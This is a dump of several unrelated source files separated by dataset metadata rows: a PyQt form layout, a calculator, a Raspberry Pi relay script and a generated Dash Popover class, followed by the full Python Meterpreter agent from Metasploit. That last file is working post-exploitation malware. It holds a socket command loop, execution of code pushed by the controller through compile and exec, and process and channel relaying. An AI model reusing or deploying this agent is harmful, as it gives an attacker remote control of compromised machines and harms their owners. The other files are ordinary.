self.opkey1Edit.setText("")
self.opkey1Edit.setObjectName("opkey1Edit")
self.verticalLayout.addWidget(self.opkey1Edit)
self.opkey2Edit = QtWidgets.QLineEdit(self.opkeysBox)
self.opkey2Edit.setTabletTracking(True)
self.opkey2Edit.setText("")
self.opkey2Edit.setObjectName("opkey2Edit")
self.verticalLayout.addWidget(self.opkey2Edit)
self.opkey3Edit = QtWidgets.QLineEdit(self.opkeysBox)
self.opkey3Edit.setTabletTracking(True)
self.opkey3Edit.setText("")
self.opkey3Edit.setObjectName("opkey3Edit")
self.verticalLayout.addWidget(self.opkey3Edit)
self.opkey4Edit = QtWidgets.QLineEdit(self.opkeysBox)
self.opkey4Edit.setTabletTracking(True)
self.opkey4Edit.setText("")
self.opkey4Edit.setObjectName("opkey4Edit")
self.verticalLayout.addWidget(self.opkey4Edit)
self.opkey5Edit = QtWidgets.QLineEdit(self.opkeysBox)
self.opkey5Edit.setTabletTracking(True)
self.opkey5Edit.setText("")
self.opkey5Edit.setObjectName("opkey5Edit")
self.verticalLayout.addWidget(self.opkey5Edit)
self.opkey6Edit = QtWidgets.QLineEdit(self.opkeysBox)
self.opkey6Edit.setTabletTracking(True)
self.opkey6Edit.setText("")
self.opkey6Edit.setClearButtonEnabled(False)
self.opkey6Edit.setObjectName("opkey6Edit")
self.verticalLayout.addWidget(self.opkey6Edit)
self.splitter = QtWidgets.QSplitter(self.issueDetailBox)
self.splitter.setGeometry(QtCore.QRect(190, 20, 291, 361))
self.splitter.setOrientation(QtCore.Qt.Vertical)
self.splitter.setObjectName("splitter")
self.newParamsBox = QtWidgets.QGroupBox(self.splitter)
sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Fixed, QtWidgets.QSizePolicy.Fixed)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(self.newParamsBox.sizePolicy().hasHeightForWidth())
self.newParamsBox.setSizePolicy(sizePolicy)
self.newParamsBox.setObjectName("newParamsBox")
self.newParamsEdit = QtWidgets.QTextEdit(self.newParamsBox)
self.newParamsEdit.setGeometry(QtCore.QRect(10, 20, 271, 141))
sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Fixed, QtWidgets.QSizePolicy.Fixed)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(self.newParamsEdit.sizePolicy().hasHeightForWidth())
self.newParamsEdit.setSizePolicy(sizePolicy)
self.newParamsEdit.setPlaceholderText("")
self.newParamsEdit.setObjectName("newParamsEdit")
self.modifiedParamsBox = QtWidgets.QGroupBox(self.splitter)
sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Fixed, QtWidgets.QSizePolicy.Fixed)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(self.modifiedParamsBox.sizePolicy().hasHeightForWidth())
self.modifiedParamsBox.setSizePolicy(sizePolicy)
self.modifiedParamsBox.setObjectName("modifiedParamsBox")
self.modifiedParamsEdit = QtWidgets.QTextEdit(self.modifiedParamsBox)
self.modifiedParamsEdit.setGeometry(QtCore.QRect(10, 20, 271, 121))
self.modifiedParamsEdit.setObjectName("modifiedParamsEdit")
self.widget = QtWidgets.QWidget(self.centralwidget)
self.widget.setGeometry(QtCore.QRect(22, 20, 661, 81))
self.widget.setObjectName("widget")
self.horizontalLayout = QtWidgets.QHBoxLayout(self.widget)
self.horizontalLayout.setContentsMargins(0, 0, 0, 0)
self.horizontalLayout.setObjectName("horizontalLayout")
self.branchSelectBox = QtWidgets.QGroupBox(self.widget)
sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Preferred, QtWidgets.QSizePolicy.Preferred)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(self.branchSelectBox.sizePolicy().hasHeightForWidth())
self.branchSelectBox.setSizePolicy(sizePolicy)
self.branchSelectBox.setObjectName("branchSelectBox")
self.horizontalLayout_4 = QtWidgets.QHBoxLayout(self.branchSelectBox)
self.horizontalLayout_4.setObjectName("horizontalLayout_4")
self.checkBox10x = QtWidgets.QCheckBox(self.branchSelectBox)
self.checkBox10x.setChecked(True)
self.checkBox10x.setObjectName("checkBox10x")
self.horizontalLayout_4.addWidget(self.checkBox10x)
self.checkBox9x = QtWidgets.QCheckBox(self.branchSelectBox)
self.checkBox9x.setChecked(True)
self.checkBox9x.setObjectName("checkBox9x")
self.horizontalLayout_4.addWidget(self.checkBox9x)
self.horizontalLayout.addWidget(self.branchSelectBox)
spacerItem1 = QtWidgets.QSpacerItem(250, 20, QtWidgets.QSizePolicy.Fixed, QtWidgets.QSizePolicy.Minimum)
self.horizontalLayout.addItem(spacerItem1)
self.startButton = QtWidgets.QPushButton(self.widget)
sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Preferred, QtWidgets.QSizePolicy.Preferred)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(self.startButton.sizePolicy().hasHeightForWidth())
self.startButton.setSizePolicy(sizePolicy)
font = QtGui.QFont()
font.setFamily("Consolas")
font.setPointSize(14)
self.startButton.setFont(font)
self.startButton.setWhatsThis("")
self.startButton.setObjectName("startButton")
self.horizontalLayout.addWidget(self.startButton)
CCMTask.setCentralWidget(self.centralwidget)
self.statusbar = QtWidgets.QStatusBar(CCMTask)
self.statusbar.setObjectName("statusbar")
CCMTask.setStatusBar(self.statusbar)
self.retranslateUi(CCMTask)
QtCore.QMetaObject.connectSlotsByName(CCMTask)
def retranslateUi(self, CCMTask):
_translate = QtCore.QCoreApplication.translate
CCMTask.setWindowTitle(_translate("CCMTask", "CCMTask"))
self.issueBox.setTitle(_translate("CCMTask", "需求信息"))
self.ARDTSEdit.setPlaceholderText(_translate("CCMTask", "AR或者DTS编号"))
self.issueInfoEdit.setPlaceholderText(_translate("CCMTask", "需求描述信息"))
self.issueDetailBox.setTitle(_translate("CCMTask", "需求内容"))
self.deletedParamsBox.setTitle(_translate("CCMTask", "删除参数"))
self.opkeysBox_2.setTitle(_translate("CCMTask", "审核人列表"))
self.opkeysBox.setTitle(_translate("CCMTask", "运营商列表"))
self.opkey1Edit.setPlaceholderText(_translate("CCMTask", "OPkey1"))
self.opkey2Edit.setPlaceholderText(_translate("CCMTask", "OPkey2"))
self.opkey3Edit.setPlaceholderText(_translate("CCMTask", "OPkey3"))
self.opkey4Edit.setPlaceholderText(_translate("CCMTask", "OPkey4"))
self.opkey5Edit.setPlaceholderText(_translate("CCMTask", "OPkey5"))
self.opkey6Edit.setPlaceholderText(_translate("CCMTask", "OPkey6"))
self.newParamsBox.setTitle(_translate("CCMTask", "新增参数"))
self.modifiedParamsBox.setTitle(_translate("CCMTask", "修改参数"))
self.branchSelectBox.setTitle(_translate("CCMTask", "分支选择"))
self.checkBox10x.setText(_translate("CCMTask", "10.x ALL"))
self.checkBox9x.setText(_translate("CCMTask", "9.x ALL"))
self.startButton.setText(_translate("CCMTask", "Start"))
| 57 | 112 | 0.732539 | 1,365 | 15,105 | 8.028571 | 0.130403 | 0.072999 | 0.038781 | 0.042705 | 0.342823 | 0.269276 | 0.229492 | 0.209234 | 0.200839 | 0.172735 | 0 | 0.02802 | 0.163588 | 15,105 | 264 | 113 | 57.215909 | 0.839402 | 0.011718 | 0 | 0.131474 | 1 | 0 | 0.049326 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.007968 | false | 0 | 0.003984 | 0 | 0.015936 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
b8028a1a0d82b7861ade532f7556efe716f52f14 | 1,136 | py | Python | Day10/calci.py | viditvarshney/100DaysOfCode | eec82c98087093f1aec1cb21acab82368ae785a3 | [
"MIT"
] | null | null | null | Day10/calci.py | viditvarshney/100DaysOfCode | eec82c98087093f1aec1cb21acab82368ae785a3 | [
"MIT"
] | null | null | null | Day10/calci.py | viditvarshney/100DaysOfCode | eec82c98087093f1aec1cb21acab82368ae785a3 | [
"MIT"
] | null | null | null | from logo import logo
def add(n1, n2):
return n1 + n2
def multiply(n1, n2):
return n1 * n2
def subtract(n1, n2):
return n1 - n2
def divide(n1, n2):
return n1 / n2
symbols = ['+', '-', '/', '*']
operations = {'+': add, '-': subtract,
'*': multiply, '/': divide}
def Calci():
print(logo)
num1 = float(input("Enter 1st number: "))
for key in operations:
print(key)
while True:
choice = input("Choose an operation: ")
if not choice in symbols:
print("WARNING! Invalid Operation symbol: ")
break
num2 = float(input("Enter next number: "))
calculation_func = operations[choice]
result = calculation_func(num1, num2)
print(f"{num1} {choice} {num2} = {result}")
clear = input(
f"Type 'y to continue with {result} or 'new' to start a new calculation 'n' to exit: ")
if clear.casefold() == 'y':
num1 = result
elif clear.casefold() == 'new':
Calci()
else:
print(f"Your final result is: {result}")
break
Calci()
| 21.037037 | 100 | 0.529049 | 133 | 1,136 | 4.503759 | 0.451128 | 0.053422 | 0.066778 | 0.080134 | 0.108514 | 0.085142 | 0 | 0 | 0 | 0 | 0 | 0.031537 | 0.330106 | 1,136 | 53 | 101 | 21.433962 | 0.755585 | 0 | 0 | 0.111111 | 0 | 0.027778 | 0.221831 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.138889 | false | 0 | 0.027778 | 0.111111 | 0.277778 | 0.138889 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 1 |
b80d9fd4d22bb1d71b3dd29f2cdfd01260186b03 | 614 | py | Python | python/right_couch_move.py | ktmock13/PiCouch | 21992efca9fa382c7a02c10fb037a994143038c6 | [
"Apache-2.0"
] | null | null | null | python/right_couch_move.py | ktmock13/PiCouch | 21992efca9fa382c7a02c10fb037a994143038c6 | [
"Apache-2.0"
] | null | null | null | python/right_couch_move.py | ktmock13/PiCouch | 21992efca9fa382c7a02c10fb037a994143038c6 | [
"Apache-2.0"
] | null | null | null | import RPi.GPIO as GPIO
from time import sleep
import sys
#setup
GPIO.setmode(GPIO.BOARD)
openRelay=11
closeRelay=13
GPIO.setup(openRelay, GPIO.OUT)
GPIO.setup(closeRelay, GPIO.OUT)
#get cmd args
duration = float(sys.argv[1])
opening = sys.argv[2] in ['true', 'True', '1', 'TRUE']
relay = openRelay if opening else closeRelay
#start
GPIO.output(relay, GPIO.HIGH)
print 'starting ' + ('open' if opening else 'close') + ' signal..'
#wait
print ' ' + str(duration) + 'secs'
sleep(duration)
#stop
print ' ...ending signal'
GPIO.output(relay, GPIO.LOW)
| 20.466667 | 66 | 0.640065 | 83 | 614 | 4.73494 | 0.53012 | 0.045802 | 0.066158 | 0.096692 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.014644 | 0.221498 | 614 | 29 | 67 | 21.172414 | 0.807531 | 0.04886 | 0 | 0 | 0 | 0 | 0.209343 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0 | 0.176471 | null | null | 0.176471 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
b80eb5f1166695a86c73eccb3c18067bd324e51b | 3,725 | py | Python | lib/python3.7/site-packages/dash_bootstrap_components/_components/Popover.py | dukuaris/Django | d34f3e3f09028511e96b99cae7faa1b46458eed1 | [
"MIT"
] | null | null | null | lib/python3.7/site-packages/dash_bootstrap_components/_components/Popover.py | dukuaris/Django | d34f3e3f09028511e96b99cae7faa1b46458eed1 | [
"MIT"
] | 12 | 2020-06-06T01:22:26.000Z | 2022-03-12T00:13:42.000Z | lib/python3.7/site-packages/dash_bootstrap_components/_components/Popover.py | dukuaris/Django | d34f3e3f09028511e96b99cae7faa1b46458eed1 | [
"MIT"
] | null | null | null | # AUTO GENERATED FILE - DO NOT EDIT
from dash.development.base_component import Component, _explicitize_args
class Popover(Component):
"""A Popover component.
Keyword arguments:
- children (a list of or a singular dash component, string or number; optional): The children of this component
- id (string; optional): The ID of this component, used to identify dash components
in callbacks. The ID needs to be unique across all of the
components in an app.
- style (dict; optional): Defines CSS styles which will override styles previously set.
- className (string; optional): Often used with CSS to style elements with common properties.
- key (string; optional): A unique identifier for the component, used to improve
performance by React.js while rendering components
See https://reactjs.org/docs/lists-and-keys.html for more info
- placement (a value equal to: 'auto', 'auto-start', 'auto-end', 'top', 'top-start', 'top-end', 'right', 'right-start', 'right-end', 'bottom', 'bottom-start', 'bottom-end', 'left', 'left-start', 'left-end'; optional): Specify popover placement.
- target (string; optional): ID of the component to attach the popover to.
- container (string; optional): Where to inject the popper DOM node, default body.
- is_open (boolean; optional): Whether the Popover is open or not.
- hide_arrow (boolean; optional): Hide popover arrow.
- innerClassName (string; optional): CSS class to apply to the popover.
- delay (dict; optional): Optionally override show/hide delays - default {show: 0, hide: 250}. delay has the following type: dict containing keys 'show', 'hide'.
Those keys have the following types:
- show (number; optional)
- hide (number; optional) | number
- offset (string | number; optional): Popover offset.
- loading_state (dict; optional): Object that holds the loading state object coming from dash-renderer. loading_state has the following type: dict containing keys 'is_loading', 'prop_name', 'component_name'.
Those keys have the following types:
- is_loading (boolean; optional): Determines if the component is loading or not
- prop_name (string; optional): Holds which property is loading
- component_name (string; optional): Holds the name of the component that is loading"""
@_explicitize_args
def __init__(self, children=None, id=Component.UNDEFINED, style=Component.UNDEFINED, className=Component.UNDEFINED, key=Component.UNDEFINED, placement=Component.UNDEFINED, target=Component.UNDEFINED, container=Component.UNDEFINED, is_open=Component.UNDEFINED, hide_arrow=Component.UNDEFINED, innerClassName=Component.UNDEFINED, delay=Component.UNDEFINED, offset=Component.UNDEFINED, loading_state=Component.UNDEFINED, **kwargs):
self._prop_names = ['children', 'id', 'style', 'className', 'key', 'placement', 'target', 'container', 'is_open', 'hide_arrow', 'innerClassName', 'delay', 'offset', 'loading_state']
self._type = 'Popover'
self._namespace = 'dash_bootstrap_components/_components'
self._valid_wildcard_attributes = []
self.available_properties = ['children', 'id', 'style', 'className', 'key', 'placement', 'target', 'container', 'is_open', 'hide_arrow', 'innerClassName', 'delay', 'offset', 'loading_state']
self.available_wildcard_properties = []
_explicit_args = kwargs.pop('_explicit_args')
_locals = locals()
_locals.update(kwargs) # For wildcard attrs
args = {k: _locals[k] for k in _explicit_args if k != 'children'}
for k in []:
if k not in args:
raise TypeError(
'Required argument `' + k + '` was not specified.')
super(Popover, self).__init__(children=children, **args)
| 67.727273 | 432 | 0.720537 | 480 | 3,725 | 5.479167 | 0.333333 | 0.088973 | 0.020532 | 0.014449 | 0.132319 | 0.132319 | 0.109506 | 0.081369 | 0.081369 | 0.081369 | 0 | 0.001287 | 0.165906 | 3,725 | 54 | 433 | 68.981481 | 0.845188 | 0.575034 | 0 | 0 | 1 | 0 | 0.201142 | 0.023477 | 0 | 0 | 0 | 0 | 0 | 1 | 0.052632 | false | 0 | 0.052632 | 0 | 0.157895 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
b81415a0a71fcac22aeb01aa39ba0c4dc0f68e8c | 13,866 | py | Python | data/meterpreter/meterpreter.py | codex8/metasploit-framework | eb745af12fe591e94f8d6ce9dac0396d834991ab | [
"Apache-2.0",
"BSD-3-Clause"
] | 1 | 2015-11-05T21:38:38.000Z | 2015-11-05T21:38:38.000Z | data/meterpreter/meterpreter.py | codex8/metasploit-framework | eb745af12fe591e94f8d6ce9dac0396d834991ab | [
"Apache-2.0",
"BSD-3-Clause"
] | null | null | null | data/meterpreter/meterpreter.py | codex8/metasploit-framework | eb745af12fe591e94f8d6ce9dac0396d834991ab | [
"Apache-2.0",
"BSD-3-Clause"
] | null | null | null | #!/usr/bin/python
import code
import ctypes
import os
import random
import select
import socket
import struct
import subprocess
import sys
import threading
has_windll = hasattr(ctypes, 'windll')
#
# Constants
#
PACKET_TYPE_REQUEST = 0
PACKET_TYPE_RESPONSE = 1
PACKET_TYPE_PLAIN_REQUEST = 10
PACKET_TYPE_PLAIN_RESPONSE = 11
ERROR_SUCCESS = 0
# not defined in original C implementation
ERROR_FAILURE = 1
CHANNEL_CLASS_BUFFERED = 0
CHANNEL_CLASS_STREAM = 1
CHANNEL_CLASS_DATAGRAM = 2
CHANNEL_CLASS_POOL = 3
#
# TLV Meta Types
#
TLV_META_TYPE_NONE = ( 0 )
TLV_META_TYPE_STRING = (1 << 16)
TLV_META_TYPE_UINT = (1 << 17)
TLV_META_TYPE_RAW = (1 << 18)
TLV_META_TYPE_BOOL = (1 << 19)
TLV_META_TYPE_COMPRESSED = (1 << 29)
TLV_META_TYPE_GROUP = (1 << 30)
TLV_META_TYPE_COMPLEX = (1 << 31)
# not defined in original
TLV_META_TYPE_MASK = (1<<31)+(1<<30)+(1<<29)+(1<<19)+(1<<18)+(1<<17)+(1<<16)
#
# TLV base starting points
#
TLV_RESERVED = 0
TLV_EXTENSIONS = 20000
TLV_USER = 40000
TLV_TEMP = 60000
#
# TLV Specific Types
#
TLV_TYPE_ANY = TLV_META_TYPE_NONE | 0
TLV_TYPE_METHOD = TLV_META_TYPE_STRING | 1
TLV_TYPE_REQUEST_ID = TLV_META_TYPE_STRING | 2
TLV_TYPE_EXCEPTION = TLV_META_TYPE_GROUP | 3
TLV_TYPE_RESULT = TLV_META_TYPE_UINT | 4
TLV_TYPE_STRING = TLV_META_TYPE_STRING | 10
TLV_TYPE_UINT = TLV_META_TYPE_UINT | 11
TLV_TYPE_BOOL = TLV_META_TYPE_BOOL | 12
TLV_TYPE_LENGTH = TLV_META_TYPE_UINT | 25
TLV_TYPE_DATA = TLV_META_TYPE_RAW | 26
TLV_TYPE_FLAGS = TLV_META_TYPE_UINT | 27
TLV_TYPE_CHANNEL_ID = TLV_META_TYPE_UINT | 50
TLV_TYPE_CHANNEL_TYPE = TLV_META_TYPE_STRING | 51
TLV_TYPE_CHANNEL_DATA = TLV_META_TYPE_RAW | 52
TLV_TYPE_CHANNEL_DATA_GROUP = TLV_META_TYPE_GROUP | 53
TLV_TYPE_CHANNEL_CLASS = TLV_META_TYPE_UINT | 54
TLV_TYPE_SEEK_WHENCE = TLV_META_TYPE_UINT | 70
TLV_TYPE_SEEK_OFFSET = TLV_META_TYPE_UINT | 71
TLV_TYPE_SEEK_POS = TLV_META_TYPE_UINT | 72
TLV_TYPE_EXCEPTION_CODE = TLV_META_TYPE_UINT | 300
TLV_TYPE_EXCEPTION_STRING = TLV_META_TYPE_STRING | 301
TLV_TYPE_LIBRARY_PATH = TLV_META_TYPE_STRING | 400
TLV_TYPE_TARGET_PATH = TLV_META_TYPE_STRING | 401
TLV_TYPE_MIGRATE_PID = TLV_META_TYPE_UINT | 402
TLV_TYPE_MIGRATE_LEN = TLV_META_TYPE_UINT | 403
TLV_TYPE_CIPHER_NAME = TLV_META_TYPE_STRING | 500
TLV_TYPE_CIPHER_PARAMETERS = TLV_META_TYPE_GROUP | 501
def generate_request_id():
chars = 'abcdefghijklmnopqrstuvwxyz'
return ''.join(random.choice(chars) for x in xrange(32))
def packet_get_tlv(pkt, tlv_type):
offset = 0
while (offset < len(pkt)):
tlv = struct.unpack('>II', pkt[offset:offset+8])
if (tlv[1] & ~TLV_META_TYPE_COMPRESSED) == tlv_type:
val = pkt[offset+8:(offset+8+(tlv[0] - 8))]
if (tlv[1] & TLV_META_TYPE_STRING) == TLV_META_TYPE_STRING:
val = val.split('\x00', 1)[0]
elif (tlv[1] & TLV_META_TYPE_UINT) == TLV_META_TYPE_UINT:
val = struct.unpack('>I', val)[0]
elif (tlv[1] & TLV_META_TYPE_BOOL) == TLV_META_TYPE_BOOL:
val = bool(struct.unpack('b', val)[0])
elif (tlv[1] & TLV_META_TYPE_RAW) == TLV_META_TYPE_RAW:
pass
return {'type':tlv[1], 'length':tlv[0], 'value':val}
offset += tlv[0]
return {}
def tlv_pack(*args):
if len(args) == 2:
tlv = {'type':args[0], 'value':args[1]}
else:
tlv = args[0]
data = ""
if (tlv['type'] & TLV_META_TYPE_STRING) == TLV_META_TYPE_STRING:
data = struct.pack('>II', 8 + len(tlv['value']) + 1, tlv['type']) + tlv['value'] + '\x00'
elif (tlv['type'] & TLV_META_TYPE_UINT) == TLV_META_TYPE_UINT:
data = struct.pack('>III', 12, tlv['type'], tlv['value'])
elif (tlv['type'] & TLV_META_TYPE_BOOL) == TLV_META_TYPE_BOOL:
data = struct.pack('>II', 9, tlv['type']) + chr(int(bool(tlv['value'])))
elif (tlv['type'] & TLV_META_TYPE_RAW) == TLV_META_TYPE_RAW:
data = struct.pack('>II', 8 + len(tlv['value']), tlv['type']) + tlv['value']
elif (tlv['type'] & TLV_META_TYPE_GROUP) == TLV_META_TYPE_GROUP:
data = struct.pack('>II', 8 + len(tlv['value']), tlv['type']) + tlv['value']
elif (tlv['type'] & TLV_META_TYPE_COMPLEX) == TLV_META_TYPE_COMPLEX:
data = struct.pack('>II', 8 + len(tlv['value']), tlv['type']) + tlv['value']
return data
class STDProcessBuffer(threading.Thread):
def __init__(self, std, is_alive):
threading.Thread.__init__(self)
self.std = std
self.is_alive = is_alive
self.data = ''
self.data_lock = threading.RLock()
def run(self):
while self.is_alive():
byte = self.std.read(1)
self.data_lock.acquire()
self.data += byte
self.data_lock.release()
self.data_lock.acquire()
self.data += self.std.read()
self.data_lock.release()
def is_read_ready(self):
return len(self.data) != 0
def read(self, l = None):
data = ''
self.data_lock.acquire()
if l == None:
data = self.data
self.data = ''
else:
data = self.data[0:l]
self.data = self.data[l:]
self.data_lock.release()
return data
class STDProcess(subprocess.Popen):
def __init__(self, *args, **kwargs):
subprocess.Popen.__init__(self, *args, **kwargs)
def start(self):
self.stdout_reader = STDProcessBuffer(self.stdout, lambda: self.poll() == None)
self.stdout_reader.start()
self.stderr_reader = STDProcessBuffer(self.stderr, lambda: self.poll() == None)
self.stderr_reader.start()
class PythonMeterpreter(object):
def __init__(self, socket):
self.socket = socket
self.extension_functions = {}
self.channels = {}
self.interact_channels = []
self.processes = {}
for func in filter(lambda x: x.startswith('_core'), dir(self)):
self.extension_functions[func[1:]] = getattr(self, func)
self.running = True
def register_function(self, func):
self.extension_functions[func.__name__] = func
def register_function_windll(self, func):
if has_windll:
self.register_function(func)
def add_channel(self, channel):
idx = 0
while idx in self.channels:
idx += 1
self.channels[idx] = channel
return idx
def add_process(self, process):
idx = 0
while idx in self.processes:
idx += 1
self.processes[idx] = process
return idx
def run(self):
while self.running:
if len(select.select([self.socket], [], [], 0)[0]):
request = self.socket.recv(8)
if len(request) != 8:
break
req_length, req_type = struct.unpack('>II', request)
req_length -= 8
request = ''
while len(request) < req_length:
request += self.socket.recv(4096)
response = self.create_response(request)
self.socket.send(response)
else:
channels_for_removal = []
channel_ids = self.channels.keys() # iterate over the keys because self.channels could be modified if one is closed
for channel_id in channel_ids:
channel = self.channels[channel_id]
data = ''
if isinstance(channel, STDProcess):
if not channel_id in self.interact_channels:
continue
if channel.stdout_reader.is_read_ready():
data = channel.stdout_reader.read()
elif channel.stderr_reader.is_read_ready():
data = channel.stderr_reader.read()
elif channel.poll() != None:
self.handle_dead_resource_channel(channel_id)
elif isinstance(channel, socket._socketobject):
while len(select.select([channel.fileno()], [], [], 0)[0]):
try:
d = channel.recv(1)
except socket.error:
d = ''
if len(d) == 0:
self.handle_dead_resource_channel(channel_id)
break
data += d
if data:
pkt = struct.pack('>I', PACKET_TYPE_REQUEST)
pkt += tlv_pack(TLV_TYPE_METHOD, 'core_channel_write')
pkt += tlv_pack(TLV_TYPE_CHANNEL_ID, channel_id)
pkt += tlv_pack(TLV_TYPE_CHANNEL_DATA, data)
pkt += tlv_pack(TLV_TYPE_LENGTH, len(data))
pkt += tlv_pack(TLV_TYPE_REQUEST_ID, generate_request_id())
pkt = struct.pack('>I', len(pkt) + 4) + pkt
self.socket.send(pkt)
def handle_dead_resource_channel(self, channel_id):
del self.channels[channel_id]
if channel_id in self.interact_channels:
self.interact_channels.remove(channel_id)
pkt = struct.pack('>I', PACKET_TYPE_REQUEST)
pkt += tlv_pack(TLV_TYPE_METHOD, 'core_channel_close')
pkt += tlv_pack(TLV_TYPE_REQUEST_ID, generate_request_id())
pkt += tlv_pack(TLV_TYPE_CHANNEL_ID, channel_id)
pkt = struct.pack('>I', len(pkt) + 4) + pkt
self.socket.send(pkt)
def _core_loadlib(self, request, response):
data_tlv = packet_get_tlv(request, TLV_TYPE_DATA)
if (data_tlv['type'] & TLV_META_TYPE_COMPRESSED) == TLV_META_TYPE_COMPRESSED:
return ERROR_FAILURE
preloadlib_methods = self.extension_functions.keys()
i = code.InteractiveInterpreter({'meterpreter':self, 'packet_get_tlv':packet_get_tlv, 'tlv_pack':tlv_pack, 'STDProcess':STDProcess})
i.runcode(compile(data_tlv['value'], '', 'exec'))
postloadlib_methods = self.extension_functions.keys()
new_methods = filter(lambda x: x not in preloadlib_methods, postloadlib_methods)
for method in new_methods:
response += tlv_pack(TLV_TYPE_METHOD, method)
return ERROR_SUCCESS, response
def _core_shutdown(self, request, response):
response += tlv_pack(TLV_TYPE_BOOL, True)
self.running = False
return ERROR_SUCCESS, response
def _core_channel_open(self, request, response):
channel_type = packet_get_tlv(request, TLV_TYPE_CHANNEL_TYPE)
handler = 'channel_create_' + channel_type['value']
if handler not in self.extension_functions:
return ERROR_FAILURE, response
handler = self.extension_functions[handler]
return handler(request, response)
def _core_channel_close(self, request, response):
channel_id = packet_get_tlv(request, TLV_TYPE_CHANNEL_ID)['value']
if channel_id not in self.channels:
return ERROR_FAILURE, response
channel = self.channels[channel_id]
if isinstance(channel, file):
channel.close()
elif isinstance(channel, subprocess.Popen):
channel.kill()
elif isinstance(s, socket._socketobject):
channel.close()
else:
return ERROR_FAILURE, response
del self.channels[channel_id]
if channel_id in self.interact_channels:
self.interact_channels.remove(channel_id)
return ERROR_SUCCESS, response
def _core_channel_eof(self, request, response):
channel_id = packet_get_tlv(request, TLV_TYPE_CHANNEL_ID)['value']
if channel_id not in self.channels:
return ERROR_FAILURE, response
channel = self.channels[channel_id]
result = False
if isinstance(channel, file):
result = channel.tell() == os.fstat(channel.fileno()).st_size
response += tlv_pack(TLV_TYPE_BOOL, result)
return ERROR_SUCCESS, response
def _core_channel_interact(self, request, response):
channel_id = packet_get_tlv(request, TLV_TYPE_CHANNEL_ID)['value']
if channel_id not in self.channels:
return ERROR_FAILURE, response
channel = self.channels[channel_id]
toggle = packet_get_tlv(request, TLV_TYPE_BOOL)['value']
if toggle:
if channel_id in self.interact_channels:
self.interact_channels.remove(channel_id)
else:
self.interact_channels.append(channel_id)
elif channel_id in self.interact_channels:
self.interact_channels.remove(channel_id)
return ERROR_SUCCESS, response
def _core_channel_read(self, request, response):
channel_id = packet_get_tlv(request, TLV_TYPE_CHANNEL_ID)['value']
length = packet_get_tlv(request, TLV_TYPE_LENGTH)['value']
if channel_id not in self.channels:
return ERROR_FAILURE, response
channel = self.channels[channel_id]
data = ''
if isinstance(channel, file):
data = channel.read(length)
elif isinstance(channel, STDProcess):
if channel.poll() != None:
self.handle_dead_resource_channel(channel_id)
if channel.stdout_reader.is_read_ready():
data = channel.stdout_reader.read(length)
elif isinstance(s, socket._socketobject):
data = channel.recv(length)
else:
return ERROR_FAILURE, response
response += tlv_pack(TLV_TYPE_CHANNEL_DATA, data)
return ERROR_SUCCESS, response
def _core_channel_write(self, request, response):
channel_id = packet_get_tlv(request, TLV_TYPE_CHANNEL_ID)['value']
channel_data = packet_get_tlv(request, TLV_TYPE_CHANNEL_DATA)['value']
length = packet_get_tlv(request, TLV_TYPE_LENGTH)['value']
if channel_id not in self.channels:
return ERROR_FAILURE, response
channel = self.channels[channel_id]
l = len(channel_data)
if isinstance(channel, file):
channel.write(channel_data)
elif isinstance(channel, subprocess.Popen):
if channel.poll() != None:
self.handle_dead_resource_channel(channel_id)
return ERROR_FAILURE, response
channel.stdin.write(channel_data)
elif isinstance(s, socket._socketobject):
try:
l = channel.send(channel_data)
except socket.error:
channel.close()
self.handle_dead_resource_channel(channel_id)
return ERROR_FAILURE, response
else:
return ERROR_FAILURE, response
response += tlv_pack(TLV_TYPE_LENGTH, l)
return ERROR_SUCCESS, response
def create_response(self, request):
resp = struct.pack('>I', PACKET_TYPE_RESPONSE)
method_tlv = packet_get_tlv(request, TLV_TYPE_METHOD)
resp += tlv_pack(method_tlv)
reqid_tlv = packet_get_tlv(request, TLV_TYPE_REQUEST_ID)
resp += tlv_pack(reqid_tlv)
if method_tlv['value'] in self.extension_functions:
handler = self.extension_functions[method_tlv['value']]
try:
result, resp = handler(request, resp)
except Exception, err:
result = ERROR_FAILURE
else:
result = ERROR_FAILURE
resp += tlv_pack(TLV_TYPE_RESULT, result)
resp = struct.pack('>I', len(resp) + 4) + resp
return resp
